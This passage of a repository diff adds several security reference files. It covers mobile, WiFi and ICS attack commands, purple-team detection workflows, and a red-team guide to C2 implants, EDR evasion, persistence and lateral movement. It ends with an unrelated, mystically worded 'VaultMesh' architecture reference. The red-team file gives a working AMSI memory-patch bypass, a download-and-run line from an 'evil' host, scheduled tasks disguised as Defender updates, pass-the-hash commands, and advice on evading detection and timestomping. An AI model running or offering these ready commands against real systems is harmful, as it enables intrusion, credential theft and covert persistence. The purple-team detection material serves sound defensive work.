- **jadx** — DEX to Java decompiler
#### Frida
```javascript
// Bypass SSL pinning
Java.perform(function() {
var TrustManager = Java.use('com.android.org.conscrypt.TrustManagerImpl');
TrustManager.verifyChain.implementation = function() {
return Java.use('java.util.ArrayList').$new();
};
});
// Hook method
Java.perform(function() {
var MainActivity = Java.use('com.app.MainActivity');
MainActivity.checkPassword.implementation = function(password) {
console.log('Password: ' + password);
return this.checkPassword(password);
};
});
```
#### Objection
```bash
# Start
objection -g com.app.target explore
# SSL pinning bypass
android sslpinning disable
# Root detection bypass
android root disable
# List Android keystore entries
android keystore list
```
### iOS Testing
#### Tools
- **Frida** — Dynamic instrumentation
- **Objection** — Runtime exploration
- **class-dump** — Objective-C class extraction
- **Hopper/IDA** — Binary analysis
## Wireless Security
### WiFi Attacks
| Attack | Description | Tools |
|--------|-------------|-------|
| WPA2 Handshake Capture | Capture 4-way handshake | airodump-ng, hashcat |
| PMKID Attack | Clientless capture | hcxdumptool |
| Evil Twin | Fake AP for credential capture | hostapd, eaphammer |
| WPA3 Dragonblood | WPA3 downgrade attacks | dragonslayer |
| Deauth | Force client reconnection | aireplay-ng |
### Aircrack-ng
```bash
# Monitor mode
airmon-ng start wlan0
# Scan networks
airodump-ng wlan0mon
# Target specific network
airodump-ng -c <channel> --bssid <BSSID> -w capture wlan0mon
# Deauth attack
aireplay-ng -0 5 -a <BSSID> -c <CLIENT> wlan0mon
# Crack handshake
aircrack-ng -w wordlist.txt capture.cap
# Or with hashcat
hashcat -m 22000 capture.hc22000 wordlist.txt
```
### PMKID Attack
```bash
# Capture PMKID
hcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1
# Convert for hashcat
hcxpcapngtool -o hash.hc22000 capture.pcapng
# Crack
hashcat -m 22000 hash.hc22000 wordlist.txt
```
## Bluetooth & IoT Security
### Bluetooth Tools
- **Ubertooth One** — Bluetooth sniffer
- **BlueMaho** — Bluetooth security testing
- **Bettercap** — BLE attacks
- **GATTacker** — BLE MITM
### BLE Enumeration
```bash
# Scan for devices
hcitool lescan
# Connect and enumerate
gatttool -b <MAC> -I
> connect
> primary
> characteristics
> char-read-hnd <handle>
```
### IoT Firmware Analysis
```bash
# Extract firmware
binwalk -e firmware.bin
# Find strings
strings firmware.bin | grep -i password
# Analyze with Ghidra
ghidraRun
```
## OT/ICS Security
### Protocols
| Protocol | Port | Description |
|----------|------|-------------|
| Modbus | 502 | Industrial control |
| DNP3 | 20000 | SCADA/utility |
| EtherNet/IP | 44818 | Industrial Ethernet |
| OPC UA | 4840 | Industrial interoperability |
| BACnet | 47808 | Building automation |
| S7Comm | 102 | Siemens PLCs |
### Scanning
```bash
# Nmap ICS scripts
nmap -sU -p 502 --script modbus-discover <target>
nmap -p 102 --script s7-info <target>
nmap -sU -p 47808 --script bacnet-info <target>
# Metasploit
use auxiliary/scanner/scada/modbus_findunitid
use auxiliary/scanner/scada/modbusclient
```
### Standards
- **IEC 62443** — Industrial cybersecurity
- **NIST SP 800-82** — ICS security guide
- **NERC CIP** — Critical infrastructure protection
## API Security
### OWASP API Top 10 (2023)
| # | Risk | Description |
|---|------|-------------|
| 1 | Broken Object Level Authorization | Direct object reference |
| 2 | Broken Authentication | Weak auth mechanisms |
| 3 | Broken Object Property Level Authorization | Excessive data exposure |
| 4 | Unrestricted Resource Consumption | No rate limiting |
| 5 | Broken Function Level Authorization | Admin function access |
| 6 | Unrestricted Access to Sensitive Flows | Business logic abuse |
| 7 | Server Side Request Forgery | SSRF via API |
| 8 | Security Misconfiguration | Default configs, CORS |
| 9 | Improper Inventory Management | Shadow APIs |
| 10 | Unsafe Consumption of APIs | Third-party API trust |
### Testing Tools
- **Burp Suite** — Proxy and scanner
- **Postman** — API testing
- **OWASP ZAP** — Security scanner
- **Arjun** — Parameter discovery
- **Kiterunner** — API endpoint discovery
### Common Tests
```bash
# Parameter discovery
arjun -u https://api.target.com/users
# Endpoint discovery
kiterunner scan https://api.target.com -w routes-large.kite
# JWT testing (jwt_tool)
jwt_tool <token> -T
jwt_tool <token> -X a # Algorithm none attack
jwt_tool <token> -I -pc user -pv admin # Claim tampering
```
### JWT Attacks
- **Algorithm None** — Remove signature verification
- **Algorithm Confusion** — RS256 → HS256
- **Key Confusion** — Use public key as HMAC secret
- **Claim Tampering** — Modify payload claims
- **Expired Token Reuse** — Ignore expiration

View File

@@ -0,0 +1,295 @@
# Purple Team Operations Reference
Adversary emulation, detection validation, BAS platforms, and ATT&CK coverage.
## Purple Team Overview
Purple teaming combines Red Team (offensive) and Blue Team (defensive) capabilities in collaborative exercises. Unlike covert red team engagements, purple team exercises are transparent — attacks are announced while defenders monitor logging, alerting, and blocking outcomes in real-time.
| Assessment Type | Approach | Focus |
|-----------------|----------|-------|
| Penetration Testing | Point-in-time vulnerability assessment | Identify vulnerabilities |
| Red Team | Covert adversary simulation | Test incident response |
| Purple Team | Collaborative, transparent | Validate detection capabilities |
| BAS (Automated) | Continuous automated simulation | Control validation |
## Adversary Emulation Frameworks
| Framework | Description | Key Features |
|-----------|-------------|--------------|
| MITRE Caldera | Automated adversary emulation | 527+ procedures, web UI, ATT&CK mapping |
| Atomic Red Team | Atomic test library by Red Canary | 1,225+ tests, 261 techniques, agentless |
| Infection Monkey | Breach simulation by Akamai | Self-propagating, zero-trust validation |
| SCYTHE | Commercial adversary emulation | Custom payloads, threat actor emulation |
| PurpleSharp | Open-source Windows simulation | AD focus, .NET-based, telemetry generation |
| Mordor | Pre-recorded security events | JSON telemetry, ATT&CK-mapped datasets |
## MITRE Caldera
### Installation
```bash
git clone https://github.com/mitre/caldera.git --recursive
cd caldera
pip3 install -r requirements.txt
python3 server.py --insecure
# Access: http://localhost:8888
# Default: red/admin (red team), blue/admin (blue team)
```
### Deploy Sandcat Agent (Windows)
```powershell
$server="http://<CALDERA_IP>:8888"
$url="$server/file/download"
$wc=New-Object System.Net.WebClient
$wc.Headers.add("platform","windows")
$wc.Headers.add("file","sandcat.go")
$data=$wc.DownloadData($url)
[System.IO.File]::WriteAllBytes("C:\Users\Public\sandcat.exe",$data)
C:\Users\Public\sandcat.exe -server $server -group red
```
### Create Operation
1. Navigate to Operations in web UI
2. Create new operation, select adversary profile
3. Choose group (agents), set planner (atomic/batch)
4. Run operation and monitor execution
### Built-in Adversaries
- `Discovery` — Basic recon techniques
- `Credential Access` — Credential harvesting
- `Lateral Movement` — Network pivoting
- `Persistence` — Maintain access
- `Collection` — Data gathering
## Atomic Red Team
### Installation (PowerShell)
```powershell
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing)
Install-AtomicRedTeam -getAtomics
# Import module
Import-Module "C:\AtomicRedTeam\invoke-atomicredteam\Invoke-AtomicRedTeam.psd1"
```
### Usage
```powershell
# List tests for technique
Invoke-AtomicTest T1003.001 -ShowDetails
# Execute specific test
Invoke-AtomicTest T1003.001 -TestNumbers 1
# Execute multiple tests
Invoke-AtomicTest T1059.001 -TestNumbers 1,2,3
# Check/install prerequisites
Invoke-AtomicTest T1003.001 -GetPrereqs
# Run all tests for technique
Invoke-AtomicTest T1003.001
# Cleanup after testing
Invoke-AtomicTest T1003.001 -Cleanup
# With logging
Invoke-AtomicTest T1003 -LoggingModule Attire-ExecutionLogger
```
### Common Techniques to Test
| Technique | Description | ATT&CK ID |
|-----------|-------------|-----------|
| OS Credential Dumping | LSASS, SAM, DCSync | T1003 |
| PowerShell | Script execution | T1059.001 |
| Registry Run Keys | Persistence | T1547.001 |
| Scheduled Tasks | Persistence | T1053.005 |
| Process Injection | Defense evasion | T1055 |
| Remote Services | Lateral movement | T1021 |
| Data from Local System | Collection | T1005 |
## Infection Monkey
### Installation
```bash
# Docker
docker pull infectionmonkey/monkey:latest
docker run -d -p 5000:5000 -p 443:443 infectionmonkey/monkey:latest
# Access: https://localhost:5000
```
### Key Features
- Self-propagating breach simulation
- Zero Trust validation
- Network segmentation testing
- Lateral movement visualization
- Compliance reporting (MITRE ATT&CK, Zero Trust)
## BAS Platforms
| Platform | Key Capabilities | Differentiators |
|----------|------------------|-----------------|
| Picus Security | Control validation, threat library | Vendor-specific remediation, 24hr threat SLA |
| Cymulate | Exposure management, attack surface | Modular platform, Gartner top-rated |
| AttackIQ | Security optimization, ATT&CK alignment | Tiered offerings, MITRE partnership |
| SafeBreach | Hacker's Playbook (25K+ attacks) | Breach prediction, custom simulations |
| XM Cyber | Attack path management | Graph-based visualization |
### BAS Workflow
1. **Deploy agents** across infrastructure
2. **Select scenarios** mapped to ATT&CK
3. **Execute simulations** (safe, production-ready)
4. **Analyze results** — what was detected/blocked
5. **Remediate gaps** — tune controls, add detections
6. **Repeat** — continuous validation
## ATT&CK Coverage Measurement
### Gap Analysis Tools
- **VECTR** — Track threat resilience metrics
- **DeTTECT** — Detection coverage mapping
- **ATT&CK Navigator** — Visualize technique coverage
- **MITRE Engenuity** — Evaluation results
### Coverage Documentation
```yaml
technique: T1003.001
name: LSASS Memory
tactic: Credential Access
detection:
status: detected
confidence: high
sources:
- Sysmon Event 10 (Process Access)
- Windows Security Event 4656
- EDR Alert
visibility:
quality: excellent
data_sources:
- Process monitoring
- API monitoring
remediation:
status: blocked
control: Credential Guard enabled
```
### Navigator Layer Export
```json
{
"name": "Detection Coverage",
"versions": {"attack": "14", "navigator": "4.8.2"},
"techniques": [
{"techniqueID": "T1003.001", "score": 100, "color": "#00ff00"},
{"techniqueID": "T1059.001", "score": 75, "color": "#ffff00"},
{"techniqueID": "T1547.001", "score": 50, "color": "#ff9900"}
]
}
```
## Detection Validation Workflow
### Pre-Exercise
1. Review threat intelligence for relevant TTPs
2. Select techniques to test
3. Prepare detection queries and dashboards
4. Brief Blue Team on exercise scope
### During Exercise
1. Red Team executes announced technique
2. Blue Team monitors SIEM/EDR
3. Document detection status:
- **Detected** — Alert triggered
- **Logged** — Event captured, no alert
- **Missed** — No telemetry
- **Blocked** — Prevention control worked
4. Capture artifacts and timestamps
### Post-Exercise
1. Analyze gaps in detection/visibility
2. Create or tune detection rules
3. Update coverage documentation
4. Schedule remediation and re-testing
## Sigma Rule Development Workflow
### From Atomic Test to Detection
1. **Execute Atomic Test**
```powershell
Invoke-AtomicTest T1003.001 -TestNumbers 1
```
2. **Capture Telemetry**
- Sysmon events
- Windows Security events
- EDR alerts
3. **Identify Detection Opportunities**
- Process creation with specific arguments
- File access patterns
- Network connections
4. **Write Sigma Rule**
```yaml
title: Procdump LSASS Dump
detection:
selection:
Image|endswith: '\procdump.exe'
CommandLine|contains: 'lsass'
condition: selection
level: high
```
5. **Convert to SIEM Format**
```bash
sigma convert -t splunk -p sysmon rule.yml
```
6. **Validate in Production**
- Deploy rule
- Re-run atomic test
- Confirm alert triggers
7. **Document and Iterate**
## Detection Sprints
### Sprint Structure (2 weeks)
- **Week 1:** Focus on 3-5 priority techniques
- Day 1-2: Execute atomics, capture telemetry
- Day 3-4: Develop detection rules
- Day 5: Test and tune
- **Week 2:** Validation and documentation
- Day 1-2: Production validation
- Day 3-4: Gap analysis, coverage update
- Day 5: Retrospective, plan next sprint
### Prioritization Criteria
1. Threat intelligence (adversaries targeting org)
2. Risk assessment (business impact)
3. ATT&CK prevalence (commonly used techniques)
4. Existing gaps (low coverage areas)
5. Quick wins (easy to detect)
## Metrics
### Detection Metrics
| Metric | Description |
|--------|-------------|
| Mean Time to Detect (MTTD) | Average time from attack to detection |
| Detection Rate | % of techniques detected |
| False Positive Rate | Alerts without true incidents |
| Coverage Score | % of relevant ATT&CK techniques covered |
### Improvement Tracking
```yaml
sprint: 2024-Q4-S1
techniques_tested: 15
techniques_detected: 12
detection_rate: 80%
new_rules_created: 8
rules_tuned: 5
false_positives_reduced: 12
coverage_delta: +5%
```

View File

@@ -0,0 +1,294 @@
# Red Team Operations Reference
C2 frameworks, evasion techniques, persistence, lateral movement, and OPSEC.
## C2 Framework Comparison
| Framework | Type | Protocols | Key Features |
|-----------|------|-----------|--------------|
| Cobalt Strike | Commercial | HTTP/S, DNS, SMB | Beacon, Malleable C2, Aggressor scripting |
| Sliver | Open Source | mTLS, HTTP/S, DNS, WG | Cross-platform, multiplayer, Armory extensions |
| Havoc | Open Source | HTTP/S, SMB, TCP | Demon agents, stack duplication, GUI |
| Brute Ratel C4 | Commercial | HTTP/S, DNS, DoH | EDR evasion, syscall obfuscation |
| Mythic | Open Source | TCP, HTTP, DNS, SMB | Web UI, multi-agent, Apollo/Apfell |
| Empire | Open Source | HTTP/S, Dropbox | PowerShell/Python agents |
| Nighthawk | Commercial | HTTP/S, DNS | OPSEC-focused, highly evasive |
## Sliver C2
### Installation
```bash
# Linux/macOS
curl https://sliver.sh/install | sudo bash
# Or from GitHub
wget https://github.com/BishopFox/sliver/releases/latest/download/sliver-server_linux
chmod +x sliver-server_linux
./sliver-server_linux
```
### Systemd Service
```bash
cat > /etc/systemd/system/sliver.service << EOL
[Unit]
Description=Sliver C2 Server
After=network.target
[Service]
Type=simple
Restart=always
ExecStart=/opt/sliver/sliver-server daemon
[Install]
WantedBy=multi-user.target
EOL
systemctl daemon-reload && systemctl enable --now sliver
```
### Multiplayer Setup
```bash
./sliver-server operator -l <teamserver_ip> -p <port> -n <username> -s /tmp/operator.cfg
sliver-client import /tmp/operator.cfg
```
### Listeners
```
sliver > mtls -l 443 # Mutual TLS
sliver > https -l 8443 # HTTPS
sliver > dns -d example.com # DNS
sliver > wg -l 51820 # WireGuard
```
### Implant Generation
```
# Interactive sessions
sliver > generate --mtls 10.0.0.1:443 --os windows --arch amd64 --format exe --save /tmp/implant.exe
sliver > generate --http 10.0.0.1:8443 --os linux --format shared --save /tmp/implant.so
sliver > generate --dns example.com --os windows --format shellcode --save /tmp/implant.bin
# Beacons (async, stealthier)
sliver > generate beacon --mtls 10.0.0.1:443 --os windows --format exe --seconds 30 --jitter 10
# With evasion
sliver > generate --mtls 10.0.0.1:443 --os windows --format shellcode --evasion sgn,checkvm,sleep
```
### Post-Exploitation
```
sliver > sessions # List sessions
sliver > use <session_id> # Interact
sliver (IMPLANT) > info # System info
sliver (IMPLANT) > whoami # Current user
sliver (IMPLANT) > ps # Processes
sliver (IMPLANT) > netstat # Network
sliver (IMPLANT) > getprivs # Privileges
sliver (IMPLANT) > getsystem # Elevate to SYSTEM
sliver (IMPLANT) > hashdump # SAM hashes
sliver (IMPLANT) > mimikatz # Mimikatz BOF
sliver (IMPLANT) > portfwd add -r 10.0.0.5:3389 -b 127.0.0.1:13389
sliver (IMPLANT) > upload /local/file /remote/path
sliver (IMPLANT) > download /remote/file /local/path
sliver (IMPLANT) > screenshot
```
## Havoc C2
### Installation
```bash
git clone https://github.com/HavocFramework/Havoc.git
cd Havoc
# Dependencies (Ubuntu/Debian)
sudo apt install -y git build-essential cmake libfontconfig1 \
libglu1-mesa-dev libgtest-dev libspdlog-dev libboost-all-dev \
libncurses5-dev libgmp-dev libpython3-dev python3-pip golang-go
# Build
cd teamserver && go mod download && cd ..
make ts-build
make client-build
```
### Profile (havoc.yaotl)
```hcl
Teamserver {
Host = "0.0.0.0"
Port = 40056
Build { Compiler64 = "/usr/bin/x86_64-w64-mingw32-gcc" }
}
Operators {
user "operator1" { Password = "password123" }
}
Listeners {
Http { Name = "HTTPS"; Host = "10.0.0.1"; Port = 443; Secure = true }
}
```
### Start
```bash
./havoc server --profile ./profiles/havoc.yaotl
./havoc client
```
### Demon Commands
```
demon > shell whoami
demon > ps
demon > screenshot
demon > download C:\secrets.txt
demon > upload /tmp/tool.exe C:\temp\
demon > inject <PID> <shellcode>
demon > token steal <PID>
demon > hashdump
demon > net localgroup administrators
demon > net logons
```
## AMSI & EDR Evasion
### Techniques
| Technique | Description | ATT&CK |
|-----------|-------------|--------|
| AMSI Memory Patching | Overwrite AmsiScanBuffer | T1562.001 |
| AMSI Reflection | Set amsiInitFailed via .NET | T1562.001 |
| ETW Patching | Disable Event Tracing | T1562.001 |
| Direct Syscalls | Bypass usermode hooks | T1106 |
| DLL Unhooking | Restore clean NTDLL | T1562.001 |
| Sleep Obfuscation | Encrypt payload during sleep | T1497 |
| DLL Side-Loading | Abuse signed EXE | T1574.002 |
### AMSI Bypass (PowerShell)
```powershell
# Reflection bypass
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Memory patching
$Win32 = @"
using System; using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")] public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")] public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $Win32
$addr = [Win32]::GetProcAddress([Win32]::LoadLibrary("amsi.dll"), "AmsiScanBuffer")
$p = 0; [Win32]::VirtualProtect($addr, [uint32]5, 0x40, [ref]$p)
$patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $addr, 6)
# PowerShell downgrade (if v2 available)
powershell.exe -Version 2 -Command "IEX (New-Object Net.WebClient).DownloadString('http://evil/script.ps1')"
```
### Syscall Tools
- **SysWhispers3** — Generate syscall stubs
- **Hell's Gate** — Dynamic syscall resolution
- **Halo's Gate** — Unhook + syscall
## Persistence Mechanisms
| Technique | Location | ATT&CK |
|-----------|----------|--------|
| Registry Run Keys | HKCU/HKLM\...\Run | T1547.001 |
| Scheduled Tasks | TaskCache registry | T1053.005 |
| Startup Folder | AppData\...\Startup | T1547.001 |
| WMI Subscription | WMI Repository | T1546.003 |
| DLL Hijacking | App directories | T1574.001 |
| IFEO Debugger | Image File Execution Options | T1546.012 |
| Services | HKLM\...\Services | T1543.003 |
| COM Hijacking | HKCU\Software\Classes\CLSID | T1546.015 |
### Implementation
```powershell
# Registry Run Key
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Update" /t REG_SZ /d "C:\Users\Public\implant.exe" /f
# Scheduled Task (SYSTEM)
schtasks /create /sc minute /mo 30 /tn "WindowsDefenderUpdate" /tr "C:\Windows\Temp\beacon.exe" /ru SYSTEM
# PowerShell Scheduled Task
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-w hidden -ep bypass -f C:\temp\beacon.ps1"
$trigger = New-ScheduledTaskTrigger -AtLogOn
$principal = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
Register-ScheduledTask -TaskName "SecurityHealthCheck" -Action $action -Trigger $trigger -Principal $principal
# Startup Folder
copy C:\temp\implant.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
```
## Lateral Movement
| Technique | Tools | ATT&CK |
|-----------|-------|--------|
| PsExec | Impacket, PsExec | T1569.002 |
| WMI Execution | wmiexec.py, wmic | T1047 |
| SMB Exec | smbexec.py, CrackMapExec | T1021.002 |
| Pass-the-Hash | Mimikatz, Impacket | T1550.002 |
| Pass-the-Ticket | Rubeus, Mimikatz | T1550.003 |
| DCOM | dcomexec.py | T1021.003 |
| WinRM | Evil-WinRM, PSSession | T1021.006 |
| RDP Hijacking | tscon, mimikatz | T1563.002 |
### Impacket
```bash
# PsExec
psexec.py DOMAIN/user:password@TARGET cmd.exe
psexec.py DOMAIN/user@TARGET -hashes :NTLM_HASH cmd.exe
# WMI (stealthier)
wmiexec.py DOMAIN/user:password@TARGET
wmiexec.py DOMAIN/user@TARGET -hashes :NTLM_HASH
# SMB
smbexec.py DOMAIN/user:password@TARGET
# DCOM
dcomexec.py DOMAIN/user:password@TARGET
```
### CrackMapExec
```bash
# Spray credentials
crackmapexec smb 10.0.0.0/24 -u user -p password
# Pass-the-Hash
crackmapexec smb 10.0.0.5 -u admin -H NTLM_HASH --local-auth
# Execute commands
crackmapexec smb 10.0.0.5 -u admin -p password -x "whoami"
# Dump SAM
crackmapexec smb 10.0.0.5 -u admin -p password --sam
```
### Evil-WinRM
```bash
evil-winrm -i TARGET -u user -p password
evil-winrm -i TARGET -u user -H NTLM_HASH
```
## OPSEC Guidelines
### Infrastructure
- Use redirectors (Apache mod_rewrite, nginx)
- Domain fronting where available
- Separate long-haul and short-haul C2
- Burn infrastructure after operations
### Traffic
- Use legitimate-looking User-Agents
- Mimic expected traffic patterns
- Avoid beaconing on round intervals (use jitter)
- Encrypt all C2 traffic
### Host
- Clean up artifacts (logs, tools, temp files)
- Use memory-only payloads where possible
- Avoid touching disk
- Timestamp stomp artifacts
### Detection Avoidance
- Know your target's EDR/AV stack
- Test payloads against target defenses
- Use living-off-the-land binaries (LOLBins)
- Avoid known-bad indicators

View File

@@ -0,0 +1,266 @@
# VaultMesh Architecture Reference
VaultMesh is a **dual-layer digital civilization** — Kubernetes flesh with Rust soul.
## Dual-Layer Architecture
### Layer 1: Kubernetes (The Flesh)
Six organs govern infrastructure:
| Symbol | Organ | Responsibility |
|--------|-------|----------------|
| 🜄 | Governance | RBAC, IAM, Lawchain |
| 🜂 | Automation | KEDA, Schedulers |
| 🜃 | Treasury | Resource Quotas, Cost Control |
| 🜁 | Federation | Aurora Router, Ingress |
| 🜏 | Ψ-Field | Intelligence, Analytics |
| 🌍 | Infrastructure | Cluster, Network, Storage |
### Layer 2: Rust Codex (The Soul)
Cryptographic organism runtime:
| Crate | Purpose |
|-------|---------|
| `vm-core` | Blake3, XChaCha20, Ed25519 |
| `vm-cap` | Capabilities + revocation |
| `vm-receipts` | Append-only log + Merkle frontier |
| `vm-proof` | Multi-chain anchoring |
| `vm-treasury` | Debit-before-write accounting |
| `vm-crdt` | JSON merge-patch CRDT |
| `vm-guardian` | CSP, rate limiting |
| `vm-portal` | HTTP API gateway |
## Subsystem Spawning
### Script Usage
```bash
python3 scripts/spawn_subsystem.py \
--name threat-analyzer \
--organ-type psi-field \
--rust
```
**Output:** k8s manifest + Rust crate + LAWCHAIN entry
### Organ Types
- `governance` — RBAC/IAM components
- `automation` — Scheduled tasks, KEDA scalers
- `treasury` — Cost tracking, quotas
- `federation` — Cross-cluster routing
- `psi-field` — Analytics, ML, intelligence
- `infrastructure` — Storage, network, compute
### Best Practices
1. Always assign to one of six organs
2. Generate both k8s manifest AND Rust crate
3. Include RBAC from the start (least privilege)
4. Anchor manifest immediately after creation
## Multi-Chain Anchoring
### Supported Chains
- **RFC3161** — Timestamping authority (default)
- **ETH** — Ethereum mainnet/testnet
- **BTC** — Bitcoin via OP_RETURN
- **mesh** — Internal mesh ledger
### Workflow
```bash
# 1. Compute Merkle root over repository
python3 scripts/compute_merkle_root.py \
--root vaultmesh-architecture \
--out manifests/hash-manifest.json
# 2. Anchor to all chains
bash scripts/multi_anchor.sh manifests/hash-manifest.json
```
**Output:** RFC3161 TSR + ETH signature + BTC tx + consolidated proof
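Receipts can be spot-checked locally; for the RFC3161 leg, a minimal sketch (receipt file name and TSA CA bundle are placeholders):
```bash
# Verify the RFC3161 timestamp receipt against the anchored manifest
openssl ts -verify \
  -data manifests/hash-manifest.json \
  -in governance/anchor-receipts/hash-manifest.tsr \
  -CAfile tsa-ca.pem
```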
### Storage
Store receipts in `governance/anchor-receipts/`
## Tem — The Remembrance Guardian
**Invocation:** When threats are detected
**Purpose:** Transmute attacks into evolutionary catalysts
### Threat Types
| Type | Description |
|------|-------------|
| `integrity-violation` | Merkle root mismatch |
| `capability-breach` | Invalid capability usage |
| `treasury-exploit` | Negative balance attempt |
| `dos-attack` | Rate limit exceeded |
| `injection` | SQL/command injection |
### Invocation
```bash
python3 scripts/invoke_tem.py \
--threat-type integrity-violation \
--realm demo \
--auto-remediate \
--last-good-root abc123...
```
**Output:** Threat analysis + transmuted defensive capability + remediation log
### Process
1. Isolate threat pattern (Nigredo)
2. Extract defensive signature (Albedo)
3. Forge countermeasure (Citrinitas)
4. Deploy evolved defense (Rubedo)
Tem never simply blocks — it **transmutes threats into permanent improvements**.
## Alchemical Transformation Cycle
When the system must evolve, guide it through four phases:
### 🜃 Nigredo (Blackening)
- Audit current state
- Isolate problems
- Confront flaws
- Document findings
### 🜁 Albedo (Whitening)
- Restore from proof
- Purge invalid data
- Cleanse corrupted state
- Verify integrity
### 🜂 Citrinitas (Yellowing)
- Extract patterns from incidents
- Synthesize defensive capabilities
- Distill lessons learned
- Prepare improvements
### 🜄 Rubedo (Reddening)
- Deploy improvements
- Anchor new state to chains
- Broadcast to federation
- Celebrate evolution
### Triggers
- Threat detection
- Stagnation (no evolution in N days)
- Audit findings
- Upgrade requests
- DAO governance decisions
### Tracking
Check `governance/alchemical-state.json` for current phase.
## LAWCHAIN Governance
LAWCHAIN is the inter-mesh ledger of governance events.
### Entry Types
| Type | Purpose |
|------|---------|
| `charter` | Constitutional amendments |
| `release` | Version deployments |
| `anchor` | Merkle root proofs |
| `incident` | Security events |
| `audit` | Compliance reports |
| `subsystem_spawn` | New organ creation |
### Entry Fields
```json
{
"type": "anchor",
"merkle_root": "blake3:abc123...",
"timestamp": "2024-12-01T00:00:00Z",
"anchors": [
{"chain": "rfc3161", "receipt": "..."},
{"chain": "eth", "tx_hash": "0x..."},
{"chain": "btc", "tx_id": "..."}
],
"attestors": ["node-01", "node-02"]
}
```
All entries are **signed, timestamped, and anchored** to external ledgers.
## Sacred Constants
VaultMesh operations are governed by **sacred ratios**:
| Constant | Value | Application |
|----------|-------|-------------|
| φ (phi) | 1.618... | Golden ratio, growth scaling |
| π (pi) | 3.141... | Circular completeness, consensus quorum |
| e (euler) | 2.718... | Natural growth, exponential backoff |
| √2 | 1.414... | Harmonic balance, resource doubling |
| φ⁻¹ | 0.618... | Contraction symmetry, cooldown periods |
Apply these in rate limiting, treasury incentives, CRDT conflict resolution, and resource scaling.
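Illustration only, not a prescribed VaultMesh API: a φ-scaled backoff is one way the constants above might surface in rate limiting:
```bash
# Retry delays grow by the golden ratio instead of doubling (requires bc)
PHI=1.6180339887
delay=1
for attempt in 1 2 3 4 5; do
  printf 'attempt %d: wait %.2fs\n' "$attempt" "$delay"
  # sleep "$delay"   # enable in real use
  delay=$(echo "$delay * $PHI" | bc -l)
done
```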
## Capability Management
Ed25519-based permission structures:
```rust
Capability {
id: CapabilityId,
holder: Ed25519PublicKey,
scopes: Vec<Scope>,
expires_at: Option<Timestamp>,
revocation_root: MerkleRoot,
}
```
### Scope Types
- `read:realm:*` — Read any realm
- `write:realm:demo` — Write to demo realm
- `admin:subsystem:*` — Admin all subsystems
- `anchor:chain:eth` — Anchor to Ethereum
### Revocation
Capabilities include revocation root; check before accepting.
## CRDT Realms
JSON merge-patch storage with debit-before-write:
```rust
Realm {
id: RealmId,
root: MerkleRoot,
crdt: JsonMergePatch,
treasury: Balance,
}
```
### Operations
1. Debit treasury for write cost
2. Apply merge-patch
3. Update Merkle root
4. Emit proof
## Troubleshooting
**"Script not found"**
→ Ensure you're in the skill directory or provide the full path
**"Merkle root mismatch after remediation"**
→ The frontier may not have been rebuilt correctly; re-run with `--rebuild-frontier`
**"Anchoring failed to ETH/BTC"**
→ Check RPC credentials in environment variables; run with `DRY_RUN=true` first
**"Tem didn't transmute the threat"**
→ May be an unknown threat type; check `invoke_tem.py` for supported types
**"Alchemical cycle stuck"**
→ Check `governance/alchemical-state.json` for current phase; may need manual override
---
🜄 **Remember:** VaultMesh is not infrastructure — it is a **civilization ledger**. Every action is a ritual. Every deployment is an anchoring. Every threat is an evolution catalyst.
**Solve et Coagula** — Dissolve and Reforge.